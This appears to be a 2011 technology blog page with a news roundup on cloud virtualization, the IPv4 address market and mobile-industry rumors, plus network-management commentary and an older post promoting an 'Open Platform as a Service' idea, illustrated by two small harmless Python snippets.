  • Mobile: Samsung 'considering purchasing' HP's orphaned webOS

    Samsung may be mulling over the purchase of webOS – recently orphaned by HP – in a move to protect itself from an increasingly unfriendly Apple and the threat of Google and its new toy, Motorola Mobility.

    Or so say "sources from notebook players", speaking with the Taiwanese rumor-and-news website, DigiTimes.

  • Cloud: VMware orders vCloud army across five continents

    VMware envisions a world where applications can roam across one big intercloud. Apps won't just jump from internal data centers to public cloud services, the company believes. They'll move from cloud to cloud like phone calls across cell networks.

    That's why VMware is keen on getting its vSphere server virtualization not only into the corporate data center, but out to the service providers who want to be the next Amazon EC2. Then VMware can own corporate cloud computing on both sides of the firewall.

  • Cloud: Citrix Cloud.com goes open source

    After taking control of the CloudStack cloud management framework through its acquisition of Cloud.com back in July, Citrix Systems is now open sourcing the code behind the tool. At the same time, it's adding support for the provisioning of workloads on additional hypervisors and, for the first time, on bare-metal machines.

    Cloud.com was founded in 2008 at about the same time as rival Eucalyptus Systems. It was known as VMOps before it came out of stealth mode in May 2010.

    Citrix is trotting out CloudStack 2.2.10, which has been certified to support rival VMware's ESXi 5.0 hypervisor, part of the vSphere 5.0 server virtualization stack that was announced in July and which started shipping last week.

  • Internet: The case for a free market in IPv4 addresses

    Officially, the world ran out of IPv4 addresses earlier this year, when a final batch of addresses was divided among the five Regional Internet Registries. There are still a lot of unused and underused IP addresses in the hands of various private organizations. All that is needed is an incentive for them to part with their unused addresses voluntarily. In other words, what's needed is a market in IP addresses.

    Earlier this year, Microsoft paid $7.5 million for two-thirds of a million IP addresses that were previously held by a bankrupt Nortel, suggesting that the going rate for an IP address is around $10.

    Ford, Merck, Xerox, Halliburton, and nearly a dozen other companies not primarily in the networking business were each given a Class A block of 16 million addresses. MIT also got a Class A block, and the UK government got two of them. The US government claimed about a dozen Class A blocks, giving it control of nearly 200 million addresses—more IP addresses than all of Latin America has today.
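    The article's own numbers make the arithmetic easy to check:

```python
# Figures from the article: Microsoft paid $7.5m to bankrupt Nortel for
# roughly two-thirds of a million IPv4 addresses.
paid = 7_500_000
addresses = 1_000_000 * 2 / 3        # "two-thirds of a million"
per_address = paid / addresses

class_a = 2 ** 24                    # a Class A block: 16,777,216 addresses
print(round(per_address, 2))         # 11.25 -- the "around $10" going rate
print(class_a)                       # 16777216
print(round(class_a * per_address))  # what a whole Class A is worth at that rate
```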

  • Mobile: Sprint to get seat at grown-up table when iPhone 5 hits?

    Sprint will be the next carrier to offer the iPhone to customers in the US, according to sources speaking to the Wall Street Journal. The carrier will begin offering the iPhone 5 in October alongside AT&T and Verizon, both of which are also expected to begin selling the device mid-month. It is believed that Sprint will also carry the iPhone 4, bolstering earlier rumors that Apple would keep the iPhone 4 around as the new low-cost replacement for the iPhone 3GS.

Network Management Connection

The transition from IP Version 4 to IP Version 6 may be slow moving. With companies like Microsoft buying large blocks and other companies holding millions, IP addresses are like gold and oil. These holdings may prove not only profitable, but the sale of these virtual goods may slow the implementation of IPv6.

Cloud Computing, based upon virtualization technology from VMware and Citrix's open-sourced Xen, continues to make inroads. Large system vendors like HP and Dell align themselves with proprietary VMware, while Oracle's VM technology maintains some level of compatibility with Citrix Xen. With Cloud Computing, the network becomes vastly more important.

Microsoft Windows has another worm exposure, this time around its proprietary RDP technology and its file-transfer options, while Apache on UNIX finds itself vulnerable to denial-of-service attacks. These key infrastructure points underpin modern intranet and internet computing, and both put pressure on "the network". The Apache DoS merely makes it "look like" a network problem, while the latest Microsoft worm creates a real capacity issue for "the network" if it can't be controlled.

HP finds itself bailing out of the mobile handset market (with Samsung possibly trying to buy up webOS for patent protection), a market dominated by heavyweights like Google (which ate Motorola's handset division and builds the mostly open-sourced Android), Apple (with its popular, partially open-sourced BSD UNIX-based iPhone), and Oracle (which is assaulting Google for using Java without paying license fees, as every other mobile vendor does).

The mobile market has the opportunity to heat up, with more 4G vendors arriving. By diversifying 4G to include satellite vendors alongside cell phone operators, land-line operators, and new WiMAX vendors (i.e. Clear), there is the opportunity for a real explosion in the mobile network arena... which will all need to be managed. With dominant smartphone vendors like Apple possibly releasing an iPhone for Sprint, that market could really grow as AT&T and Verizon raise their costs to customers.

Tuesday, May 3, 2011

Open-Platform-as-a-Service


A Complete Application Ecosystem

Open Platform as a Service brings all the application and system stakeholders together in an ecosystem which makes sense. First, developers create Open Applications using any language on any server, with any tool/framework/IDE, etc. From there it just gets better. The whole point of software is that it is manageable, modular and reusable. These strengths are leveraged in The Open Platform as a Service, not impeded as they are by entities with conflicts of interest in existing PaaS offerings.

The Open Platform as a Service is just that - Open


Developers can create ANY APPLICATION on ANY SERVER using ANY PROGRAMMING LANGUAGE - PERIOD. No caveats, no fine print, no nothing. Both programmers and non-programmers can extend existing Open Applications by adding additional Objects - this is huge!

For example, let's say you search The Open Store and find an Open Application called "Data Form" which creates an HTML form "automatically" based on some database fields from a MySQL database. A developer can take this "base Open Object" and add additional functionality in her own (or any other) scripts on any server on the Internet reachable via HTTP! For example, you could connect to an Oracle database and add the necessary Objects to the base Open Application and not have to roll your own application from scratch. This is a very big advantage over simply providing a web-based framework with a proprietary programming language, like Force.com and Apex, for example.

By letting programmers develop whatever they can imagine and then expose that functionality to other developers, designers and business users (if they choose to do so), you get a complete application ecosystem involving programmers, designers, non-programmers, users, Web hosting companies, clouds, etc. which can sustain and grow itself with no resistance or competing interests! This type of system could only come from a company with no competing interests.
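The "Data Form" scenario above can be sketched end to end in a few lines. Everything here is hypothetical — the endpoint name, the field list, the JSON shape — it just shows the mechanic: a base Open Object is any script reachable over HTTP, and an extension is ordinary code that calls it and adds to the result.

```python
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class DataFormObject(BaseHTTPRequestHandler):
    """Stands in for the hypothetical "Data Form" base Open Object:
    it answers GET with the fields an HTML form should render."""
    def do_GET(self):
        body = json.dumps({"fields": ["name", "email"]}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

server = HTTPServer(("127.0.0.1", 0), DataFormObject)
threading.Thread(target=server.serve_forever, daemon=True).start()
url = "http://127.0.0.1:%d/data-form" % server.server_address[1]

# The "extension": any script anywhere fetches the base object's output
# and adds its own Object -- say, a field that lives in an Oracle database.
base = json.loads(urllib.request.urlopen(url).read())
extended = base["fields"] + ["account_id"]
print(extended)  # ['name', 'email', 'account_id']
server.shutdown()
```

Because the base object is just an HTTP endpoint, the extending developer never needed its source code, its language, or its hosting provider — which is the whole point of the ecosystem described above.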